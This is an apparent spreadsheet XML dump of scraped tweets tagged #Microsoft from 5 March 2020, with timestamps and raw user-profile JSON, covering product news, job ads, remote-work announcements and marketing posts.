    <t>{'id': 3106601349, 'id_str': '3106601349', 'name': 'Married Games', 'screen_name': 'married_games', 'location': 'SÃ£o Paulo, Brasil', 'description': 'Noticias, AnÃ¡lises, Gameplays, Dicas, Tutoriais e muito mais.', 'url': 'https://t.co/2q5BbSCD6T', 'entities': {'url': {'urls': [{'url': 'https://t.co/2q5BbSCD6T', 'expanded_url': 'https://marriedgames.com.br', 'display_url': 'marriedgames.com.br', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 96, 'listed_count': 0, 'created_at': 'Mon Mar 23 03:54:08 +0000 2015', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1650,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'http://pbs.twimg.com/profile_images/1051252190642393089/tuaEyVAP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1051252190642393089/tuaEyVAP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3106601349/1539473015',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</si>
  <si>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16:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Cerner uses #Microsoft #Teams to stay ahead in a fast-paced industry - #HealthCare Becky Hand Lance Alsup https://t.co/nIeXvSczAG #MSFTAdvocate</t>
  </si>
  <si>
    <t>#Cerner drives customer confidence, improves #security and #compliance posture with #Microsoft 365 - Marc Elkins https://t.co/pP9YMIw3tp #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 15:59:44 +0000 2020</t>
  </si>
  <si>
    <t>Interested in a job in #Seattle, WA? This could be a great fit. Click the link in our bio to apply: Vehicle Sales Representative (VSR) at Ryder #Microsoft</t>
  </si>
  <si>
    <t>{'id': 24480760, 'id_str': '24480760', 'name': 'TMJ-SEA IT-.NET Jobs', 'screen_name': 'tmj_sea_itdnet', 'location': 'Seattle, WA', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Seattle, WA. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/oH9fe3D8im', 'entities': {'url': {'urls': [{'url': 'https://t.co/oH9fe3D8im', 'expanded_url': 'http://bit.ly/2Fm4s8H', 'display_url': 'bit.ly/2Fm4s8H', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 262, 'friends_count': 171, 'listed_count': 8, 'created_at': 'Sun Mar 15 03:35:12 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2,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'http://pbs.twimg.com/profile_images/682094435430088704/0AV8zOf8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682094435430088704/0AV8zOf8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24480760/1451458962',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</si>
  <si>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Thu Mar 05 15:59:19 +0000 2020</t>
  </si>
  <si>
    <t>Who wants some private nudes ? Dm me #Hartford   #horror #microsoft https://t.co/dQKBSEuikm</t>
  </si>
  <si>
    <t>{'id': 1235521889352773633, 'id_str': '1235521889352773633', 'name': 'Tina Smith', 'screen_name': 'sputcarwallred', 'location': 'Springfield, USA', 'description': 'Chemistry is you touching my arm and setting fire to my mind.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Thu Mar 05 11:05:58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'http://pbs.twimg.com/profile_images/1235524768276897793/oEWxc-E7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235524768276897793/oEWxc-E7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235521889352773633/1583407074',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</si>
  <si>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15:57:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Laptops #2In1 Amazon beat out Microsoft's own sale price on the Surface Pro X https://t.co/BfrPW6AhPc https://t.co/RihpNWYyxC</t>
  </si>
  <si>
    <t>{'id': 305030732, 'id_str': '305030732', 'name': 'Principal-IT', 'screen_name': 'Principal_IT', 'location': 'Miramar, FL', 'description': 'We created our 3-P approach to keep both our company and our clients focused on using technology as a strategic tool to maximize their competitive advantage.', 'url': 'https://t.co/Qw2LNW58HH', 'entities': {'url': {'urls': [{'url': 'https://t.co/Qw2LNW58HH', 'expanded_url': 'http://www.principal-it.com', 'display_url': 'principal-it.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 615, 'friends_count': 1611, 'listed_count': 5, 'created_at': 'Wed May 25 14:36:28 +0000 2011', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4282, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '020812', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/835190083171012608/b5z5_Kl-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/835190083171012608/b5z5_Kl-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/305030732/1568929799', 'profile_link_color': '17406C', 'profile_sidebar_border_color': '2280A9', 'profile_sidebar_fill_color': '020812', 'profile_text_color': '2280A9', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:56:41 +0000 2020</t>
  </si>
  <si>
    <t>Cisco, Microsoft team to control growing IoT networks
https://t.co/LFiQABXGt5 
#iot #networking #software #cisco #microsoft #cloud #architecture #visualstudio #m2m #issquared https://t.co/TiWfbu8hmF</t>
  </si>
  <si>
    <t>Thu Mar 05 15:56:33 +0000 2020</t>
  </si>
  <si>
    <t>"Lets Encrypt is using Microsoft GitHub for their site and for their code. So much for security, eh?" https://t.co/SMdqklatP5 #deletegithub #microsoft #nsa #letsencrypt</t>
  </si>
  <si>
    <t>Thu Mar 05 15:55:56 +0000 2020</t>
  </si>
  <si>
    <t>Since people are flexing...
 #crucible #pvp #6v6 #warlock #hunter #titan #destiny2 #d2 #bungie #microsoft #xbox #playstation #pc #fps #gaming #gamer #contentcreator #youtube #linkinbio https://t.co/gdkZ7EpwRA</t>
  </si>
  <si>
    <t>{'id': 1204186738144317440, 'id_str': '1204186738144317440', 'name': '_morganixx_', 'screen_name': 'morganixx1', 'location': '', 'description': 'Primarily make video game content on YouTube. Specifically Destiny 2. Also stream game play and give opinions. youtube: morganixx, twitch: morganic. IG: tba', 'url': 'https://t.co/ZPV1xTyRDh', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZPV1xTyRDh', 'expanded_url': 'https://www.youtube.com/user/pineapple3x', 'display_url': 'youtube.com/user/pineappleâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Mon Dec 09 23:51:16 +0000 2019', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 148, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1204188726768783361/DZP9AmHd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204188726768783361/DZP9AmHd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1204186738144317440/1575937003',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</si>
  <si>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15:55:20 +0000 2020</t>
  </si>
  <si>
    <t>The one and only #Windows95man playing at #Microsoft #TechDays. An excellent day with many great meetings on Good Sign Solutions data-driven pricing and automatic billing complementing #Dynamics365. https://t.co/7XZoa0hQuD</t>
  </si>
  <si>
    <t>{'id': 85837284, 'id_str': '85837284', 'name': 'Tuomas Eerola', 'screen_name': 'tuomaseerola', 'location': 'Finland', 'description': '', 'url': 'http://t.co/gDMzrpgzji', 'entities': {'url': {'urls': [{'url': 'http://t.co/gDMzrpgzji', 'expanded_url': 'http://www.iki.fi/eerola', 'display_url': 'iki.fi/eerola', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 100, 'listed_count': 32, 'created_at': 'Wed Oct 28 15:09:27 +0000 2009', 'favourites_count': 47, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1667,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'http://pbs.twimg.com/profile_images/1759918400/facebookprofile_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1759918400/facebookprofile_normal.jpg',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</si>
  <si>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15:53:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft tells Bay Area and Puget Sound employees to work from home if possible as coronavirus spreads https://t.co/8mflDbZLXP</t>
  </si>
  <si>
    <t>{'id': 331033191, 'id_str': '331033191', 'name': 'Tony Castellano', 'screen_name': 'WesternCSM', 'location': 'Phoexnix, AZ USA', 'description': 'Director of Sales for Western Computer selling Microsoft Dynamics 365 business solutions. Husband, Father, passionate about mentoring &amp; beach volleyball', 'url': 'https://t.co/feVkSs1Mb8', 'entities': {'url': {'urls': [{'url': 'https://t.co/feVkSs1Mb8', 'expanded_url': 'http://www.westerncomputer.com', 'display_url': 'westerncomputer.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 613, 'friends_count': 602, 'listed_count': 70, 'created_at': 'Thu Jul 07 15:02:41 +0000 2011', 'favourites_count': 102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1958, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DBE9ED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/789248651532959749/gMoEA3mi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/789248651532959749/gMoEA3mi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/331033191/1519223256', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Mar 05 15:52:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Laptops Amazon beat out Microsoft's own sale price on the Surface Pro X https://t.co/SFOoc3dCpR | https://t.co/9AaTTqXITl https://t.co/bQH7ze2ZSz</t>
  </si>
  <si>
    <t>{'id': 809229705073147904, 'id_str': '809229705073147904', 'name': 'eStream Studios', 'screen_name': 'eStream_Studios', 'location': '', 'description': 'Follow us and subscribe for tech and gaming news! Check out this interesting passive income opportunity! \nðŸ‘‰https://t.co/GO2HSl2v24ðŸ‘ˆ', 'url': 'https://t.co/GO2HSl2v24', 'entities': {'url': {'urls': [{'url': 'https://t.co/GO2HSl2v24', 'expanded_url': 'http://bit.ly/FXtrade11', 'display_url': 'bit.ly/FXtrade11', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/GO2HSl2v24', 'expanded_url': 'http://bit.ly/FXtrade11', 'display_url': 'bit.ly/FXtrade11', 'indices': [107, 130]}]}}, 'protected': False, 'followers_count': 10014, 'friends_count': 11345, 'listed_count': 75, 'created_at': 'Thu Dec 15 02:52:51 +0000 2016', 'favourites_count': 3245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 263547, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/985754941774905344/TUf_hNbF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/985754941774905344/TUf_hNbF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/809229705073147904/1523857231',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</si>
  <si>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15:51:42 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT some megahard gains on #Microsoft https://t.co/FOO0MMTxaK</t>
  </si>
  <si>
    <t>{'id': 789769838809980928, 'id_str': '789769838809980928', 'name': 'Daytrade with ZEN', 'screen_name': 'zen_n_trade', 'location': 'In Senses, Mind', 'description': 'Education: Ph.D. (Neuroscience) \nPassion: Patterns (Stock Market)\n\nOn voyage of discipline + patience in systematic trading since 2003. Tweets are not guidance.', 'url': 'https://t.co/HMXNBbw3AD', 'entities': {'url': {'urls': [{'url': 'https://t.co/HMXNBbw3AD', 'expanded_url': 'https://www.zen-trades.com', 'display_url': 'zen-trades.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8166, 'friends_count': 43, 'listed_count': 107, 'created_at': 'Sat Oct 22 10:06:17 +0000 2016', 'favourites_count': 293, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10448,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'http://pbs.twimg.com/profile_images/947506581847052289/E2PynqRG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/947506581847052289/E2PynqRG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/789769838809980928/1515456911',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</si>
  <si>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15:50:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft allows employees to work from home amid #coronavirus outbreak: https://t.co/epVBlo32zc
Who's working from home today? 
#TheITTrainer #ITTraining #Microsoft #Coronavirus #WorkingFromHome</t>
  </si>
  <si>
    <t>{'id': 19668668, 'id_str': '19668668', 'name': 'The IT Trainer', 'screen_name': 'The_IT_Trainer', 'location': 'United Kingdom', 'description': "UKwide #ITTraining -Workshops, Floor Walking, #ELearning. Check your employees' skills levels with our FREE Training Needs Analysis (link below). Tweets by Adam", 'url': 'https://t.co/nN1sHNaWZf', 'entities': {'url': {'urls': [{'url': 'https://t.co/nN1sHNaWZf', 'expanded_url': 'http://www.the-it-trainer.co.uk/on-site-training/free-online-training-needs-analysis', 'display_url': 'the-it-trainer.co.uk/on-site-trainiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11841, 'friends_count': 7917, 'listed_count': 260, 'created_at': 'Wed Jan 28 19:03:20 +0000 2009', 'favourites_count': 14155, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29285,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'http://pbs.twimg.com/profile_images/631395317670379520/pSgXQl8x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/631395317670379520/pSgXQl8x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19668668/1580293782',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</si>
  <si>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15:50:06 +0000 2020</t>
  </si>
  <si>
    <t>#VMware and #Microsoft #AVS black belt technical teams collabrated at Palo Alto office.  
So much brain power in this room, making hybrid cloud possible for the customers.
#HCX #azure #maas #vcps #HybridCloud https://t.co/Hq4yAFQ37o</t>
  </si>
  <si>
    <t>{'id': 764960982, 'id_str': '764960982', 'name': 'David Chung ðŸ‡ºðŸ‡¸', 'screen_name': 'dchung615', 'location': '', 'description': 'VCPP, MaaS SDDC Solutions Architect @VMware. Technology enthusiast in everything virtual and cloudy. #ProblemSolver #Musician #Dogs #Cycling #RoadTrip #Geek', 'url': 'https://t.co/HD0vd4JDHd', 'entities': {'url': {'urls': [{'url': 'https://t.co/HD0vd4JDHd', 'expanded_url': 'https://vcloudone.com', 'display_url': 'vcloudone.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 517, 'friends_count': 472, 'listed_count': 16, 'created_at': 'Sat Aug 18 03:18:09 +0000 2012', 'favourites_count': 945, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 776,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'http://pbs.twimg.com/profile_images/697994652696219649/iPM7gZlD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/697994652696219649/iPM7gZlD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/764960982/1571876127',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</si>
  <si>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15:49:22 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Qlik Sense for Data Science and BI #udemycoupon -&amp;gt; https://t.co/WPn6txrfvC
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Thu Mar 05 15:48:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and the NFL are expanding their alliance to add Microsoft Teams to the NFL's tools  #MicrosoftTeams #Microsoft #PeopleAtTheCenter https://t.co/LhevDGrPb8</t>
  </si>
  <si>
    <t>{'id': 10277362, 'id_str': '10277362', 'name': 'DaveJaworski', 'screen_name': 'DaveJaworski', 'location': 'Nashville, TN', 'description': "God's Child. Susan's husband, Jenn (David) (Eli and Cecilia's Papa), Amanda (Chris), Sarah (John) (Owen and Heidi's Papa) and Jonathon's Dad. Microsoft.", 'url': 'http://t.co/D9pz12ppqj', 'entities': {'url': {'urls': [{'url': 'http://t.co/D9pz12ppqj', 'expanded_url': 'http://jaworski.net', 'display_url': 'jaworski.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1295, 'friends_count': 2352, 'listed_count': 38, 'created_at': 'Thu Nov 15 13:29:27 +0000 2007', 'favourites_count': 1750, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2947,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'http://pbs.twimg.com/profile_images/1147299734/DaveJaworski3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147299734/DaveJaworski3_normal.png',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</si>
  <si>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Mar 05 15:46:42 +0000 2020</t>
  </si>
  <si>
    <t>Our AI technology engine, @SystemsImagin, was featured on @Microsoft regarding big data and cutting-edge medical insights. For more info, visit the short video below. #Microsoft #ai #BigData 
https://t.co/yzKrTT8Zqk</t>
  </si>
  <si>
    <t>{'id': 960927611953168384, 'id_str': '960927611953168384', 'name': 'Systems Oncology', 'screen_name': 'SystemsOncology', 'location': '7201 E Henkel Way Suite 205, Scottsdale, AZ 85255', 'description': 'We believe that innovating cancer drug development requires deeper mechanistic insights into cancer biology, and that requires the exponential power of AI.', 'url': 'https://t.co/VLf4iJQqEE', 'entities': {'url': {'urls': [{'url': 'https://t.co/VLf4iJQqEE', 'expanded_url': 'https://www.systemsoncology.com', 'display_url': 'systemsoncology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 168, 'friends_count': 409, 'listed_count': 2, 'created_at': 'Tue Feb 06 17:26:10 +0000 2018', 'favourites_count': 536, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 237, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/960929369668534272/gavfCjYb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/960929369668534272/gavfCjYb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/960927611953168384/1517938959',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</si>
  <si>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15:45:08 +0000 2020</t>
  </si>
  <si>
    <t>Quick update on my Dynamics 365 Customer Insights discovery.
#valoremreply #microsoft #d365thoughts #Dynamics365 #customerinsights #powerplatform #ArtificialIntelligence https://t.co/EpqEwtDgEL</t>
  </si>
  <si>
    <t>{'id': 50888957, 'id_str': '50888957', 'name': 'Scott Roller', 'screen_name': 'gishsteele', 'location': 'Kansas City, MO', 'description': 'Dynamics 365 | Power Platform | MIZZOU Fan | Soccer Coach', 'url': 'https://t.co/otkPlyyelU', 'entities': {'url': {'urls': [{'url': 'https://t.co/otkPlyyelU', 'expanded_url': 'https://www.linkedin.com/in/scottjroller', 'display_url': 'linkedin.com/in/scottjroller', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 541, 'listed_count': 0, 'created_at': 'Fri Jun 26 02:41:45 +0000 2009', 'favourites_count': 258, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 93,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'http://pbs.twimg.com/profile_images/1177260244600311811/lNVRt2yh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177260244600311811/lNVRt2yh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50888957/1569515688', 'profile_link_color': 'FF0000', 'profile_sidebar_border_color': 'F2E195', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:43:22 +0000 2020</t>
  </si>
  <si>
    <t>Amazon beat out Microsoft's own sale price on the Surface Pro X https://t.co/2NQvBg1EXo #2In1 #Laptops #MashableShopping #Microsoft #Tech https://t.co/rl6VQQTtZN</t>
  </si>
  <si>
    <t>{'id': 1226653301409796097, 'id_str': '1226653301409796097', 'name': 'Powered by Pixel', 'screen_name': 'PoweredbyPixel1', 'location': 'Wisconsin', 'description': "Wisconsin's #1 Digital Agency.\n\nWe may make a small commission using the links in our posts.", 'url': 'https://t.co/oO1LOP6L55', 'entities': {'url': {'urls': [{'url': 'https://t.co/oO1LOP6L55', 'expanded_url': 'https://poweredbypixel.com', 'display_url': 'poweredbypixel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Sun Feb 09 23:45:20 +0000 2020', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 437, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226653411128442880/lWbglgsl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226653411128442880/lWbglgsl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1226653301409796097/1581292039',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</si>
  <si>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15:43:05 +0000 2020</t>
  </si>
  <si>
    <t>Amazon beat out #Microsoft's own sale price on the Surface Pro X https://t.co/TSqd8BjNxN https://t.co/Vt6d7cK57V</t>
  </si>
  <si>
    <t>{'id': 318355178, 'id_str': '318355178', 'name': 'Ï‰à¹à¹âˆ‚y', 'screen_name': 'Current_Knewz', 'location': 'âˆšÎ±. Ð²à«¯Î±à«®Ñ’, âˆšÂ¡à«¨gÂ¡à¸—Â¡Î±', 'description': 'Î¹ â„“à¹và«¯ Ð¼y hÎ±àª°â„“à«¯y, bà«¯Î±chà«¯à¸£ Î±Î·âˆ‚ à¹Æ’ cà¹Ï…àª°à¸£à«¯, Ð¼Ï…à¸£Î¹c! yà¹Ï… cÎ±Î· Î·à«¯và«¯àª° bà«¯ à¹â„“âˆ‚ Î±Î·âˆ‚ Ï‰Î¹à¸£à«¯ Î¹Æ’ yà¹Ï… Ï‰à«¯àª°à«¯ Î·à«¯và«¯àª° yà¹Ï…Î·g Î±Î·âˆ‚ càª°Î±zy! Media tweets not necessarily my opinion.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2480, 'friends_count': 84, 'listed_count': 417, 'created_at': 'Thu Jun 16 10:52:41 +0000 2011', 'favourites_count': 167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1438016, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E0A757', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/847939194894901248/QXLUqH9N_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/847939194894901248/QXLUqH9N_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/318355178/1478337852', 'profile_link_color': '1C48E6', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:42:57 +0000 2020</t>
  </si>
  <si>
    <t>@CrytoCoins @Forbes @Consensys @EYnews @Microsoft @splunk @chainlink @UnibrightIO @MakerDAO @UnibrightIO &amp;amp; @chainlink are Founding members of #BaseLineProtocol, that is huge, and this will bring tremendous adoption to the space! $UBT $LINK #Microsoft #EY #Consensus</t>
  </si>
  <si>
    <t>{'id': 1002492945847627776, 'id_str': '1002492945847627776', 'name': 'The Crypto Zap', 'screen_name': 'TheCryptoZap', 'location': '', 'description': '$OCEAN $QNT $UBT $CHR', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 965, 'friends_count': 201, 'listed_count': 9, 'created_at': 'Fri Jun 01 10:11:58 +0000 2018', 'favourites_count': 41825, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17306, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1189420723145560065/7BtkbOCM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189420723145560065/7BtkbOCM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1002492945847627776/1572415415',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</si>
  <si>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15:41:26 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "T-Mobile Data Breach Exposes Customer Personal, Financial Info:" https://t.co/1RP96GF8HZ
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Mar 05 15:40:34 +0000 2020</t>
  </si>
  <si>
    <t>#AI #microsoft #Azure     Is the cost of infrastructure keeping you from using AI to realize the full potential of your data? With Azure, you can pay for only the space you need and scale up as soon as you're ready. https://t.co/gAR6vULCYw</t>
  </si>
  <si>
    <t>Thu Mar 05 15:36:46 +0000 2020</t>
  </si>
  <si>
    <t>*** Tip of the Day ***
With Phishing Attack Simulator, administrators can now run realistic attack scenarios in an organization. Identify and find vulnerable users before a real attack can have its impact. 
See full post on our Linkedin page: https://t.co/vI8VY9WEb3
#Microsoft https://t.co/2OQj6q0gXw</t>
  </si>
  <si>
    <t>{'id': 775329826710233088, 'id_str': '775329826710233088', 'name': 'vNext IQ - Microsoft Partner', 'screen_name': 'vNext_IQ', 'location': 'Toronto', 'description': '', 'url': 'https://t.co/RFNDBzYzcu', 'entities': {'url': {'urls': [{'url': 'https://t.co/RFNDBzYzcu', 'expanded_url': 'http://vNextIQ.com', 'display_url': 'vNextIQ.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Sep 12 13:46:50 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1159906107386736640/DtFqaqM7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159906107386736640/DtFqaqM7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/775329826710233088/1565981652',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</si>
  <si>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15:35:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's latest #cloud innovation: #Printing - https://t.co/zY3GJWXqZN</t>
  </si>
  <si>
    <t>Thu Mar 05 15:35:04 +0000 2020</t>
  </si>
  <si>
    <t>3 steps for each of us to make #inclusion real - awareness, curiosity &amp;amp; courage. #Microsoft #BelieveAchieveCelebrate   #theWITNetwork #IWD2020 https://t.co/KeKrpYs7Bx</t>
  </si>
  <si>
    <t>{'id': 926987846035972097, 'id_str': '926987846035972097', 'name': 'Rani Pendse', 'screen_name': 'RaniPendse', 'location': 'Toronto, Ontario', 'description': '#Tech enthusiast #optimist She/Her #Microsoftie. My opinions are my own.', 'url': 'https://t.co/p9T5RO5IrI', 'entities': {'url': {'urls': [{'url': 'https://t.co/p9T5RO5IrI', 'expanded_url': 'http://www.linkedin.com/in/ranipendse', 'display_url': 'linkedin.com/in/ranipendse', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 39, 'listed_count': 2, 'created_at': 'Sun Nov 05 01:41:39 +0000 2017', 'favourites_count': 179, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 596,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'http://pbs.twimg.com/profile_images/1103713679600640001/WLnRxfZd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103713679600640001/WLnRxfZd_normal.png',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</si>
  <si>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15:34:48 +0000 2020</t>
  </si>
  <si>
